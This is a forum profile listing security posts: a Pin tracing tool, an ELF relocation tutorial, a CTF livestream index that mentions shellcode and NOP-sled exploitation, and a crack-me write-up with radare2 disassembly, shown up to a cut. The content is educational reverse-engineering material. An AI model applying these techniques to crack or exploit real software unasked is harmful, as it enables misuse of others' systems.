Jump to content

Nytro

Administrators
  • Posts

    18664
  • Joined

  • Last visited

  • Days Won

    683

Everything posted by Nytro

  1. tiny_tracer A Pin Tool for tracing: API calls transition between sections of the traced module (helpful in finding OEP of the packed module) Generates a report in a format: RVA;traced event i.e. 345c2;section: .text 58069;called: C:\Windows\SysWOW64\kernel32.dll.IsProcessorFeaturePresent 3976d;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW 3983c;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress 3999d;called: C:\Windows\SysWOW64\KernelBase.dll.InitializeCriticalSectionEx 398ac;called: C:\Windows\SysWOW64\KernelBase.dll.FlsAlloc 3995d;called: C:\Windows\SysWOW64\KernelBase.dll.FlsSetValue 49275;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW 4934b;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress ... How to build? To compile the prepared project you need to use Visual Studio >= 2012. It was tested with Intel Pin 3.7 and Pin 3.10. Clone this repo into \source\tools that is inside your Pin root directory. Open the project in Visual Studio and build. More details about the installation and usage you will find on the project's Wiki. Sursa: https://github.com/hasherezade/tiny_tracer
  2. ELF Binaries and Relocation Entries 29 Nov 2019 Recently I have been working on getting the OpenRISC glibc port ready for upstreaming. Part of this work has been to run the glibc testsuite and get the tests to pass. The glibc testsuite has a comprehensive set of linker and runtime relocation tests. In order to fix issues with tests I had to learn more than I did before about ELF Relocations , Thread Local Storage and the binutils linker implementation in BFD. There is a lot of documentation available, but it’s a bit hard to follow as it assumes certain knowledge, for example have a look at the Solaris Linker and Libraries section on relocations. In this article I will try to fill in those gaps. This will be an illustrated 3 part series covering ELF Binaries and Relocation Entries Thread Local Storage How Relocations and Thread Local Store are implemented All of the examples in this article can be found in my tls-examples project. Please check it out. On Linux, you can download it and make it with your favorite toolchain. By default it will cross compile using an openrisc toolchain. This can be overridden with the CROSS_COMPILE variable. For example, to build for your current host. $ git clone git@github.com:stffrdhrn/tls-examples.git $ make CROSS_COMPILE= gcc -fpic -c -o tls-gd-dynamic.o tls-gd.c -Wall -O2 -g gcc -fpic -c -o nontls-dynamic.o nontls.c -Wall -O2 -g ... objdump -dr x-static.o > x-static.S objdump -dr xy-static.o > xy-static.S Now we can get started. ELF Segments and Sections Before we can talk about relocations we need to talk a bit about what makes up ELF binaries. This is a prerequisite as relocations and TLS are part of ELF binaries. There are a few basic ELF binary types: Objects (.o) - produced by a compiler, contains a collection of sections, also call relocatable files. Program - an executable program, contains sections grouped into segments. Shared Objects (.so) - a program library, contains sections grouped into segments. Core Files - core dump of program memory, these are also ELF binaries Here we will discuss Object Files and Program Files. An ELF Object The compiler generates object files, these contain sections of binary data and these are not executable. The object file produced by gcc generally contains .rela.text, .text, .data and .bss sections. .rela.text - a list of relocations against the .text section .text - contains compiled program machine code .data - static and non static initialized variable values .bss - static and non static non-initialized variables An ELF Program ELF binaries are made of sections and segments. A segment contains a group of sections and the segment defines how the data should be loaded into memory for program execution. Each segment is mapped to program memory by the kernel when a process is created. Program files contain most of the same sections as objects but there are some differences. .text - contains executable program code, there is no .rela.text section .got - the global offset table used to access variables, created during link time. May be populated during runtime. Looking at ELF binaries (readelf) The readelf tool can help inspect elf binaries. Some examples: Reading Sections of an Object File Using the -S option we can read sections from an elf file. As we can see below we have the .text, .rela.text, .bss and many other sections. $ readelf -S tls-le-static.o There are 20 section headers, starting at offset 0x604: Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [ 0] NULL 00000000 000000 000000 00 0 0 0 [ 1] .text PROGBITS 00000000 000034 000020 00 AX 0 0 4 [ 2] .rela.text RELA 00000000 0003f8 000030 0c I 17 1 4 [ 3] .data PROGBITS 00000000 000054 000000 00 WA 0 0 1 [ 4] .bss NOBITS 00000000 000054 000000 00 WA 0 0 1 [ 5] .tbss NOBITS 00000000 000054 000004 00 WAT 0 0 4 [ 6] .debug_info PROGBITS 00000000 000054 000074 00 0 0 1 [ 7] .rela.debug_info RELA 00000000 000428 000084 0c I 17 6 4 [ 8] .debug_abbrev PROGBITS 00000000 0000c8 00007c 00 0 0 1 [ 9] .debug_aranges PROGBITS 00000000 000144 000020 00 0 0 1 [10] .rela.debug_arang RELA 00000000 0004ac 000018 0c I 17 9 4 [11] .debug_line PROGBITS 00000000 000164 000087 00 0 0 1 [12] .rela.debug_line RELA 00000000 0004c4 00006c 0c I 17 11 4 [13] .debug_str PROGBITS 00000000 0001eb 00007a 01 MS 0 0 1 [14] .comment PROGBITS 00000000 000265 00002b 01 MS 0 0 1 [15] .debug_frame PROGBITS 00000000 000290 000030 00 0 0 4 [16] .rela.debug_frame RELA 00000000 000530 000030 0c I 17 15 4 [17] .symtab SYMTAB 00000000 0002c0 000110 10 18 15 4 [18] .strtab STRTAB 00000000 0003d0 000025 00 0 0 1 [19] .shstrtab STRTAB 00000000 000560 0000a1 00 0 0 1 Reading Sections of a Program File Using the -S option on a program file we can also read the sections. The file type does not matter as long as it is an ELF we can read the sections. As we can see below there is no longer a rela.text section, but we have others including the .got section. $ readelf -S tls-le-static There are 31 section headers, starting at offset 0x32e8fc: Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [ 0] NULL 00000000 000000 000000 00 0 0 0 [ 1] .text PROGBITS 000020d4 0000d4 080304 00 AX 0 0 4 [ 2] __libc_freeres_fn PROGBITS 000823d8 0803d8 001118 00 AX 0 0 4 [ 3] .rodata PROGBITS 000834f0 0814f0 01544c 00 A 0 0 4 [ 4] __libc_subfreeres PROGBITS 0009893c 09693c 000024 00 A 0 0 4 [ 5] __libc_IO_vtables PROGBITS 00098960 096960 0002f4 00 A 0 0 4 [ 6] __libc_atexit PROGBITS 00098c54 096c54 000004 00 A 0 0 4 [ 7] .eh_frame PROGBITS 00098c58 096c58 0027a8 00 A 0 0 4 [ 8] .gcc_except_table PROGBITS 0009b400 099400 000089 00 A 0 0 1 [ 9] .note.ABI-tag NOTE 0009b48c 09948c 000020 00 A 0 0 4 [10] .tdata PROGBITS 0009dc28 099c28 000010 00 WAT 0 0 4 [11] .tbss NOBITS 0009dc38 099c38 000024 00 WAT 0 0 4 [12] .init_array INIT_ARRAY 0009dc38 099c38 000004 04 WA 0 0 4 [13] .fini_array FINI_ARRAY 0009dc3c 099c3c 000008 04 WA 0 0 4 [14] .data.rel.ro PROGBITS 0009dc44 099c44 0003bc 00 WA 0 0 4 [15] .data PROGBITS 0009e000 09a000 000de0 00 WA 0 0 4 [16] .got PROGBITS 0009ede0 09ade0 000064 04 WA 0 0 4 [17] .bss NOBITS 0009ee44 09ae44 000bec 00 WA 0 0 4 [18] __libc_freeres_pt NOBITS 0009fa30 09ae44 000014 00 WA 0 0 4 [19] .comment PROGBITS 00000000 09ae44 00002a 01 MS 0 0 1 [20] .debug_aranges PROGBITS 00000000 09ae6e 002300 00 0 0 1 [21] .debug_info PROGBITS 00000000 09d16e 0fd048 00 0 0 1 [22] .debug_abbrev PROGBITS 00000000 19a1b6 0270ca 00 0 0 1 [23] .debug_line PROGBITS 00000000 1c1280 0ce95c 00 0 0 1 [24] .debug_frame PROGBITS 00000000 28fbdc 0063bc 00 0 0 4 [25] .debug_str PROGBITS 00000000 295f98 011e35 01 MS 0 0 1 [26] .debug_loc PROGBITS 00000000 2a7dcd 06c437 00 0 0 1 [27] .debug_ranges PROGBITS 00000000 314204 00c900 00 0 0 1 [28] .symtab SYMTAB 00000000 320b04 0075d0 10 29 926 4 [29] .strtab STRTAB 00000000 3280d4 0066ca 00 0 0 1 [30] .shstrtab STRTAB 00000000 32e79e 00015c 00 0 0 1 Key to Flags: W (write), A (alloc), X (execute), M (merge), S (strings), I (info), L (link order), O (extra OS processing required), G (group), T (TLS), C (compressed), x (unknown), o (OS specific), E (exclude), p (processor specific) Reading Segments from a Program File Using the -l option on a program file we can read the segments. Notice how segments map from file offsets to memory offsets and alignment. The two different LOAD type segments are segregated by read only/execute and read/write. Each section is also mapped to a segment here. As we can see .text is in the first LOAD` segment which is executable as expected. $ readelf -l tls-le-static Elf file type is EXEC (Executable file) Entry point 0x2104 There are 5 program headers, starting at offset 52 Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align LOAD 0x000000 0x00002000 0x00002000 0x994ac 0x994ac R E 0x2000 LOAD 0x099c28 0x0009dc28 0x0009dc28 0x0121c 0x01e1c RW 0x2000 NOTE 0x09948c 0x0009b48c 0x0009b48c 0x00020 0x00020 R 0x4 TLS 0x099c28 0x0009dc28 0x0009dc28 0x00010 0x00034 R 0x4 GNU_RELRO 0x099c28 0x0009dc28 0x0009dc28 0x003d8 0x003d8 R 0x1 Section to Segment mapping: Segment Sections... 00 .text __libc_freeres_fn .rodata __libc_subfreeres __libc_IO_vtables __libc_atexit .eh_frame .gcc_except_table .note.ABI-tag 01 .tdata .init_array .fini_array .data.rel.ro .data .got .bss __libc_freeres_ptrs 02 .note.ABI-tag 03 .tdata .tbss 04 .tdata .init_array .fini_array .data.rel.ro Reading Segments from an Object File Using the -l option with an object file does not work as we can see below. readelf -l tls-le-static.o There are no program headers in this file. Relocation entries As mentioned an object file by itself is not executable. The main reason is that there are no program headers as we just saw. Another reason is that the .text section still contains relocation entries (or placeholders) for the addresses of variables located in the .data and .bss sections. These placeholders will just be 0 in the machine code. So, if we tried to run the machine code in an object file we would end up with Segmentation faults (SEGV). A relocation entry is a placeholder that is added by the compiler or linker when producing ELF binaries. The relocation entries are to be filled in with addresses pointing to data. Relocation entries can be made in code such as the .text section or in data sections like the .got section. For example: Resolving Relocations The diagram above shows relocation entries as white circles. Relocation entries may be filled or resolved at link-time or dynamically during execution. Link time relocations Place holders are filled in when ELF object files are linked by the linker to create executables or libraries For example, relocation entries in .text sections Dynamic relocations Place holders is filled during runtime by the dynamic linker. i.e. Procedure Link Table For example, relocation entries added to .got and .plt sections which link to shared objects. Note: Statically built binaries do not have any dynamic relocations and are not loaded with the dynamic linker. In general link time relocations are used to fill in relocation entries in code. Dynamic relocations fill in relocation entries in data sections. Listing Relocation Entries A list of relocations in a ELF binary can printed using readelf with the -r options. Output of readelf -r tls-gd-dynamic.o Relocation section '.rela.text' at offset 0x530 contains 10 entries: Offset Info Type Sym.Value Sym. Name + Addend 00000000 00000f16 R_OR1K_TLS_GD_HI1 00000000 x + 0 00000008 00000f17 R_OR1K_TLS_GD_LO1 00000000 x + 0 00000020 0000100c R_OR1K_GOTPC_HI16 00000000 _GLOBAL_OFFSET_TABLE_ - 4 00000024 0000100d R_OR1K_GOTPC_LO16 00000000 _GLOBAL_OFFSET_TABLE_ + 0 0000002c 00000d0f R_OR1K_PLT26 00000000 __tls_get_addr + 0 ... The relocation entry list explains how to and where to apply the relocation entry. It contains: Offset - the location in the binary that needs to be updated Info - the encoded value containing the Type, Sym and Addend, which is broken down to: Type - the type of relocation (the formula for what is to be performed is defined in the linker) Sym. Value - the address value (if known) of the symbol. Sym. Name - the name of the symbol (variable name) that this relocation needs to find during link time. Addend - a value that needs to be added to the derived symbol address. This is used to with arrays (i.e. for a relocation referencing a[14] we would have Sym. Name a and an Addend of the data size of a times 14) Example File: nontls.c In the example below we have a simple variable and a function to access it’s address. static int x; int* get_x_addr() { return &x; } Let’s see what happens when we compile this source. The steps to compile and link can be found in the tls-examples project hosting the source examples. Before Linking The diagram above shows relocations in the resulting object file as white circles. In the actual output below we can see that access to the variable x is referenced by a literal 0 in each instruction. These are highlighted with square brackets [] below for clarity. These empty parts of the .text section are relocation entries. Addr. Machine Code Assembly Relocations 0000000c <get_x_addr>: c: 19 60 [00 00] l.movhi r11,[0] # c R_OR1K_AHI16 .bss 10: 44 00 48 00 l.jr r9 14: 9d 6b [00 00] l.addi r11,r11,[0] # 14 R_OR1K_LO_16_IN_INSN .bss The function get_x_addr will return the address of variable x. We can look at the assembly instruction to understand how this is done. Some background of the OpenRISC ABI. Registers are 32-bit. Function return values are placed in register r11. To return from a function we jump to the address in the link register r9. OpenRISC has a branch delay slot, meaning the address after a branch it executed before the branch is taken. Now, lets break down the assembly: l.movhi - move the value [0] into high bits of register r11, clearing the lower bits. l.addi - add the value in register r11 to the value [0] and store the results in r11. l.jr - jump to the address in r9 This constructs a 32-bit value out of 2 16-bit values. After Linking The diagram above shows the relocations have been replaced with actual values. As we can see from the linker output the places in the machine code that had relocation place holders are now replaced with values. For example 1a 20 00 00 has become 1a 20 00 0a. 00002298 <get_x_addr>: 2298: 19 60 00 0a l.movhi r11,0xa 229c: 44 00 48 00 l.jr r9 22a0: 9d 6b ee 60 l.addi r11,r11,-4512 If we calculate 0xa << 16 + -4512 (fee60) we see get 0009ee60. That is the same location of x within our binary. This we can check with readelf -s which lists all symbols. $ readelf -s nontls-static | grep ' x' 42: 0009ee60 4 OBJECT LOCAL DEFAULT 17 x Types of Relocations As we saw above, a simple program resulted in 2 different relocation entries just to compose the address of 1 variable. We saw: R_OR1K_AHI16 R_OR1K_LO_16_IN_INSN The need for different relation types comes from the different requirements for the relocation. Processing of a relocation involves usually a very simple transform , each relocation defines a different transform. The components of the relocation definition are: Input The input of a relocation formula is always the Symbol Address who’s absolute value is unknown at compile time. But there may also be other input variables to the formula including: Program Counter The absolute address of the machine code address being updated Addend The addend available in from the relocation entry discussed above Formula How the input is manipulated to derive the output value. For example shift right 16 bits. Bit-Field Specifies which bits at the output address need to be updated. To be more specific about the above relocations we have: Relocation Type Bit-Field Formula R_OR1K_AHI16 simm16 S >> 16 R_OR1K_LO_16_IN_INSN simm16 S && 0xffff The Bit-Field described above is simm16 which means update the lower 16-bits of the 32-bit value at the output offset and do not disturb the upper 16-bits. +----------+----------+ | | simm16 | | 31 16 | 15 0 | +----------+----------+ There are many other Relocation Types with difference Bit-Fields and Formulas. These use different methods based on what each instruction does, and where each instruction encodes its immediate value. For full listings refer to architecture manuals. Linkers and Libraries - Oracle’s documentation on Intel and Sparc relocations Binutils OpenRISC Relocs - Binutil Manual containing details on OpenRISC relocations ELF for ARM[pdf] - ARM Relocation Types table on page 25 Take a look and see if you can understand how to read these now. Summary In this article we have discussed what ELF binaries are and how they can be read. We have talked about how from compilation to linking to runtime, relocation entries are used to communicate which parts of a program remain to be resolved. We then discussed how relocation types provide a formula and bit-mask for updating the places in ELF binaries that need to be filled in. In the next article we will discuss how Thread Local Storage works, both link-time and runtime relocation entries play big part in how TLS works. Further Reading Bottums Up - Dynamic Linker - Details on the Dynamic Linker, Relocations and Position Independent Code GOT and PLT Key to Code Sharing - Good overview of the .got and .plt sections Sursa: http://stffrdhrn.github.io/hardware/embedded/openrisc/2019/11/29/relocs.html
  3. GynvaelEN Part 1: https://www.youtube.com/watch?v=pYrGJ... Table of Content: 00:08 [PROLOG] nervous_testpilot - Focus | http://nervoustestpilot.co.uk/ 02:15 [PROLOG] TheFatRat - Monody (feat. Laura Brehm) | https://youtube.com/user/ThisIsTheFatRat 07:06 [PROLOG] Stellardrone - Bettween The Rings 13:20 ⁂ START ⁂ - Greetings ( ;E ) 13:45 Short agenda about todays' stream; Q&A rules 14:50 Announcements and hypes - introduction of mod's page - foxtrot_charlie | https://foxtrotlabs.cc/ - Paged Out! #2 is out // Call For Papers (one page) until 02/20/2020 (20 Feb 2020); - 16:21 Authors of articles from 1st rel of Paged Out! who have chosen non-TIP/POOL SAA should receive an email; if not get back to me - I've made one of Winja CTF '18 tasks and now it's released | https://github.com/google/google-ctf/... - It looks like Dec 2018 will be exciting contest between TOP 4 of CTF Time | ctftime.org 19:24 Let's get started! 20:44 2Warm / general / 50pts 22:42 picobrowser / web exp / 200pts - on page we see that we are not picobrowser so we are going to change User-Agent - see Dev Tools in web browser, but could be solved in different way, e.g. curl 26:39 Question: Can we use CTFs for prepare for OSCP? Q @ YT chat: are CTFs useful for real life pentesting? 29:03 plumbing / general / 200pts - netcat + "grep to win" technique which is easy and was described previously 30:11 rsa-pop-quiz / crypto / 200pts - tools: netcat + Python CLI as helper for calculations - knowledge: basics of prime numbers and RSA theory - objectives of this task: get to know with RSA - it's really simple 51:31 slippery-shellcode / bin exp / 200pts - tools: checksec.sh (checking protection of running binary) - knowledge: basics of assembly and code review of C-like languages - objectives of this task: old-school basic exploitation with a NOP sled; 32-bit ELF binary (execute shellcode, get the rid of problem with buffering, have no protections, isn't PIE...) + 0:57:44 about shellcodes + 1:00:00 writing a shellcode that uses fopen/fgets found in memory at known locations 1:10:42 Q: Do you know what AVX2 is used for in assembly? - some historical roots of SIMD extensions in Intel CPUs (MMX, SSE, AVX), why was it created, and registers naming (mm0, xmm0, ymm0, zmm0) - note from viewer: there is JSON parser library that uses vectorized instructions 1:15:16 Q: Check whether it is statically linked on the server also, not just the downloaded version. - why this should *not* be true for CTFs because of annoying players and what's the difference from not-lab exploitation cases 1:16:40 vault-door-3 / rev eng / 200pts - reversing Java code 1:27:28 "I'm going to show you another way to do this" - taking a fresh look at the same problem since I got confused by trying to do the reverse mapping in my head on livestream (which I failed hard); so instead, I showed a way to get the mapping to generate itself 1:32:29 Q: What motivates you when doing a hard challenge? 1:34:10 whats-the-difference / general / 200pts - comparing two binary files with use of python Q: What about zip() in Python when the length of lists is not equal? Q: How hard does a challenge have to be to resemble that of a real life scenario in the work force (or as close as it come)? 1:39:58 where-is-the-file / general / 200pts - file starting with . 1:41:20 WhitePages / forensics / 250pts - three code units: E2 80 83 ... - funky ASCII art or binary ASCII encoding? - at the end: a note about ASCII and code pages 1:51:03 c0rrupt / forensics / 250pts 1:51:43 In YT chat Daniel mentioned 24/7 CTF challenges (https://247ctf.com/). Take a look at it - they are really cool! Returning to task: - broken PNG file... - ...but many files are simply based on zlib aka DEFLATE (e.g. ZIP, GZIP, HTTP compression, but also PNG) - we will try to brute force it! - ...and in the end hack it in GIMP. 2:01:55 Q: With zlib compression, can we decompress even without the beginning of the bytes stream? Or if we have "holes" in the bytes stream? 2:03:55 m00nwalk / forensics / 250pts - WAV file with 11MB Please make volume down, because we are m00nwalking with SSTV over the stream sound directly 😎 - from 2:07:00 to 2:07:56 - from 2:09:57 to 2:10:03 - from 2:10:53 to 2:11:33 2:18:17 Q: What did you study in college/University and what certs did you get? See also (in Polish but Google Translate could do the thing): - https://gynvael.coldwind.pl/?id=337 - https://gynvael.coldwind.pl/?id=338 2:20:36 Epilog Thanks for attending folks! Thank you foxtrot_charlie for being my Moderator today! Next stream is planned on next Wednesday (part 3). 2:21:06 [EPILOG] nervous_testpilot - Our Heroes | http://nervoustestpilot.co.uk (kudos to J.V. for ToC!) Our Discord: https://discord.gg/QAwfE5R Our IRC: #gynvaelstream-en on freenode
  4. Practical case: Crack Me 0x03 In this article, a crack me challenge that was present in the Hackfest2019 classic CTF will be solved. The challenge has been created by myself. Firstly, information about the challenge will be given, after which it will be solved in multiple ways. At last, the challenge’s complete source code and design process will be discussed within this article. One can download the challenge here. In total, 52 teams participated in the classic Hackfest2019 CTF. Out of these, there were 18 teams that solved the challenge. Observations regarding the challenge The theme of Hackfest2019 was upside down, although the CTF itself was not bound to this theme. When opening the challenge page, one was greeted with the message that is given below. BRIEFING STATEMENT 02489184 This is a call for aid to any reverse engineer that is skilled enough to solve this riddle. Everybody here solved this ridiculously easy challenge, obviously. Duh! If you think you're worthy, then see for yourself. Oh, and uh, please do submit the answer in this online platform so we can, uh, verify it! END OF BRIEFING Aside from being both a taunt and a joke, the message contains a hint: the answer to the question is the flag for this challenge. As there is no flag format for this CTF, this hint provides valuable information. When using GNU Linux file utility, one will see that the challenge consists of a stripped x86_64 ELF binary: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=db660f9010ec370828ed57e15cbc7d25cbf4c479, stripped Upon executing the binary, it prints a riddle. After that, user input is requested. If up is down, then where are you now? I am: The program takes a few seconds before providing an answer, as can be seen below. I am: asdf Not all those who wander are lost, although it seems you are! Upon entering a long string, the program crashes. This means that there is little to no sanitation on the provided input. If up is down, then where are you now? I am: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Not all those who wander are lost, although it seems you are! *** stack smashing detected ***: terminated Aborted (core dumped) Since this is not a binary exploitation challenge, there is not too much that can be gained from experimenting with the length of the input. Lastly, the strings utility can potentially provide valuable insight into the binary itself. The output is given below. /lib64/ld-linux-x86-64.so.2 libc.so.6 strcpy srand __isoc99_scanf puts time __stack_chk_fail printf sleep __cxa_finalize strcmp __libc_start_main GLIBC_2.7 GLIBC_2.4 GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable AWAVI AUATL []A\A]A^A_ If up is down, then where are you now? I am: It seems to me, that you are home! Not all those who wander are lost, although it seems you are! ;*3$" GCC: (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0 .shstrtab .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .dynamic .data .bss .comment The strings that are shown above, are the result of using strings. Noteworthy is the string that is shown when the user is home. This likely is the message one gets when the correct input is given. It is highlighted below. It seems to me, that you are home! Multiple approaches There are multiple approaches to solve such a challenge. In this article, the challenge will be solved dynamically using Radare2, via tracing with ltrace, and statically with Ghidra. Additionally, the creation of the challenge will be discussed, together with the source code. Note that each method only uses information from the observations above. This provides insight in the multiple ways that can be used to solve this challenge. Dynamic analysis – debugging The debugging of this binary will be done using Radare2. In this article, the version of Radare2 is radare2 4.1.0-git 23803 @ linux-x86-64 git.4.0.0-42-ged0873e2f. To debug a binary, use the -d flag, together with a path to the binary, as can be seen below. r2 -d ./whereAmI.elf Radare2 will then provide information about the process ID, the binary’s address, and the bitness of the sample. The output is given below. Process with PID 17757 started... = attach 17757 17757 bin.baddr 0x555ef9f54000 Using 0x555ef9f54000 asm.bits 64 One can then instruct Radare2 to analyse the loaded binary using aaa. After the analysis is complete, one can get an overview of all functions using afl (All Functions List), as can be seen below. 0x555ef9f547c0 1 42 entry00x555efa155fe0 1 4124 reloc.__libc_start_main 0x555ef9f54720 1 6 sym.imp.strcpy 0x555ef9f54730 1 6 sym.imp.puts 0x555ef9f54740 1 6 sym.imp.__stack_chk_fail 0x555ef9f54750 1 6 sym.imp.printf 0x555ef9f54000 2 25 map.home_libra_Downloads_whereAmI.elf.r_x 0x555ef9f54760 1 6 sym.imp.srand 0x555ef9f54770 1 6 sym.imp.strcmp 0x555ef9f54780 1 6 sym.imp.time 0x555ef9f54790 1 6 sym.imp.__isoc99_scanf 0x555ef9f547a0 1 6 sym.imp.sleep 0x555ef9f548c0 5 154 -> 67 entry.init0 0x555ef9f54880 5 58 -> 51 entry.fini0 0x555ef9f547b0 1 6 fcn.555ef9f547b0 0x555ef9f547f0 4 50 -> 40 fcn.555ef9f547f0 0x555ef9f548ca 15 1874 main Based on the size and purpose of the main function, this function is the first to check out. Using s main, one can seek towards the main function. Using pdf (Print Disassembly Function), one can get the complete disassembly of the function. The disassembled instructions are given below. Afterwards, the assembly instructions are analysed in smaller parts. 0x555ef9f548ca push rbp 0x555ef9f548cb mov rbp, rsp 0x555ef9f548ce sub rsp, 0x820 0x555ef9f548d5 mov dword [var_814h], edi ; argc 0x555ef9f548db mov qword [var_820h], rsi ; argv 0x555ef9f548e2 mov rax, qword fs:[0x28] 0x555ef9f548eb mov qword [var_8h], rax 0x555ef9f548ef xor eax, eax 0x555ef9f548f1 lea rdi, str.If_up_is_down__then_where_are_you_now ; 0x555ef9f550a8 ; "If up is down, then where are you now?" 0x555ef9f548f8 call sym.imp.puts ; int puts(const char *s) 0x555ef9f548fd lea rdi, str.I_am: ; 0x555ef9f550cf ; "I am: " 0x555ef9f54904 mov eax, 0 0x555ef9f54909 call sym.imp.printf ; int printf(const char *format) 0x555ef9f5490e lea rax, [var_20h] 0x555ef9f54912 mov rsi, rax 0x555ef9f54915 lea rdi, [0x555ef9f550d6] ; "%s" 0x555ef9f5491c mov eax, 0 0x555ef9f54921 call sym.imp.__isoc99_scanf ; int scanf(const char *format) 0x555ef9f54926 mov edi, 3 0x555ef9f5492b call sym.imp.sleep ; int sleep(int s) ;omitted variable initialisations 0x555ef9f54ea1 mov qword [var_4d8h], rax 0x555ef9f54ea8 mov dword [var_800h], 4 0x555ef9f54eb2 mov dword [var_7fch], 0x12c ; 300 0x555ef9f54ebc mov edi, 0 0x555ef9f54ec1 call sym.imp.time ; time_t time(time_t *timer) 0x555ef9f54ec6 mov edi, eax 0x555ef9f54ec8 call sym.imp.srand ; void srand(int seed) 0x555ef9f54ecd mov dword [var_804h], 0 0x555ef9f54ed7 mov dword [var_7f8h], 0x29 ; ')' ; 41 0x555ef9f54ee1 mov dword [var_7f4h], 3 0x555ef9f54eeb mov byte [var_9h], 0xa 0x555ef9f54eef mov dword [var_804h], 0 ┌─< 0x555ef9f54ef9 jmp 0x555ef9f54f24 ┌──> 0x555ef9f54efb mov eax, dword [var_804h] ╎│ 0x555ef9f54f01 movsxd rdx, eax ╎│ 0x555ef9f54f04 mov rax, qword [var_788h] ╎│ 0x555ef9f54f0b add rax, rdx ╎│ 0x555ef9f54f0e movzx edx, byte [rax] ╎│ 0x555ef9f54f11 mov eax, dword [var_804h] ╎│ 0x555ef9f54f17 cdqe ╎│ 0x555ef9f54f19 mov byte [rbp + rax - 0x14], dl ╎│ 0x555ef9f54f1d add dword [var_804h], 1 ╎│ ; CODE XREF from main @ 0x555ef9f54ef9 ╎└─> 0x555ef9f54f24 mov eax, dword [var_804h] ╎ 0x555ef9f54f2a cmp eax, dword [var_7f4h] └──< 0x555ef9f54f30 jl 0x555ef9f54efb 0x555ef9f54f32 lea rax, [var_14h] 0x555ef9f54f36 add rax, 3 0x555ef9f54f3a mov rdx, qword [var_4e0h] 0x555ef9f54f41 mov rsi, rdx 0x555ef9f54f44 mov rdi, rax 0x555ef9f54f47 call sym.imp.strcpy ; char *strcpy(char *dest, const char *src) 0x555ef9f54f4c mov dword [var_804h], 0 ┌─< 0x555ef9f54f56 jmp 0x555ef9f54f85 ┌──> 0x555ef9f54f58 mov eax, dword [var_804h] ╎│ 0x555ef9f54f5e movsxd rdx, eax ╎│ 0x555ef9f54f61 mov rax, qword [var_670h] ╎│ 0x555ef9f54f68 add rax, rdx ╎│ 0x555ef9f54f6b mov edx, dword [var_804h] ╎│ 0x555ef9f54f71 lea ecx, [rdx + 6] ╎│ 0x555ef9f54f74 movzx edx, byte [rax] ╎│ 0x555ef9f54f77 movsxd rax, ecx ╎│ 0x555ef9f54f7a mov byte [rbp + rax - 0x14], dl ╎│ 0x555ef9f54f7e add dword [var_804h], 1 ╎│ ; CODE XREF from main @ 0x555ef9f54f56 ╎└─> 0x555ef9f54f85 cmp dword [var_804h], 2 └──< 0x555ef9f54f8c jle 0x555ef9f54f58 0x555ef9f54f8e mov dword [var_804h], 0 ┌─< 0x555ef9f54f98 jmp 0x555ef9f54fc7 ┌──> 0x555ef9f54f9a mov eax, dword [var_804h] ╎│ 0x555ef9f54fa0 movsxd rdx, eax ╎│ 0x555ef9f54fa3 mov rax, qword [var_718h] ╎│ 0x555ef9f54faa add rax, rdx ╎│ 0x555ef9f54fad mov edx, dword [var_804h] ╎│ 0x555ef9f54fb3 lea ecx, [rdx + 9] ╎│ 0x555ef9f54fb6 movzx edx, byte [rax] ╎│ 0x555ef9f54fb9 movsxd rax, ecx ╎│ 0x555ef9f54fbc mov byte [rbp + rax - 0x14], dl ╎│ 0x555ef9f54fc0 add dword [var_804h], 1 ╎│ ; CODE XREF from main @ 0x555ef9f54f98 ╎└─> 0x555ef9f54fc7 cmp dword [var_804h], 2 └──< 0x555ef9f54fce jle 0x555ef9f54f9a 0x555ef9f54fd0 lea rdx, [var_20h] 0x555ef9f54fd4 lea rax, [var_14h] 0x555ef9f54fd8 mov rsi, rdx 0x555ef9f54fdb mov rdi, rax 0x555ef9f54fde call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2) 0x555ef9f54fe3 test eax, eax ┌─< 0x555ef9f54fe5 jne 0x555ef9f54ff5 │ 0x555ef9f54fe7 lea rdi, str.It_seems_to_me__that_you_are_home ; 0x555ef9f55268 ; "It seems to me, that you are home!" │ 0x555ef9f54fee call sym.imp.puts ; int puts(const char *s) ┌──< 0x555ef9f54ff3 jmp 0x555ef9f55001 │└─> 0x555ef9f54ff5 lea rdi, str.Not_all_those_who_wander_are_lost__although_it_seems_you_are ; 0x555ef9f55290 ; "Not all those who wander are lost, although it seems you are!" │ 0x555ef9f54ffc call sym.imp.puts ; int puts(const char *s) │ ; CODE XREF from main @ 0x555ef9f54ff3 └──> 0x555ef9f55001 mov eax, 0 0x555ef9f55006 mov rcx, qword [var_8h] 0x555ef9f5500a xor rcx, qword fs:[0x28] ┌─< 0x555ef9f55013 je 0x555ef9f5501a │ 0x555ef9f55015 call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void) └─> 0x555ef9f5501a leave └ 0x555ef9f5501b ret Note that the comments and arrows are added by Radare2. The first part of the code contains the function prologue, sets the values of argc and argv, prints the riddle via puts and printf, and takes the user input via scanf. 0x555ef9f548ca push rbp 0x555ef9f548cb mov rbp, rsp 0x555ef9f548ce sub rsp, 0x820 0x555ef9f548d5 mov dword [var_814h], edi ; argc 0x555ef9f548db mov qword [var_820h], rsi ; argv 0x555ef9f548e2 mov rax, qword fs:[0x28] 0x555ef9f548eb mov qword [var_8h], rax 0x555ef9f548ef xor eax, eax 0x555ef9f548f1 lea rdi, str.If_up_is_down__then_where_are_you_now ; 0x555ef9f550a8 ; "If up is down, then where are you now?" 0x555ef9f548f8 call sym.imp.puts ; int puts(const char *s) 0x555ef9f548fd lea rdi, str.I_am: ; 0x555ef9f550cf ; 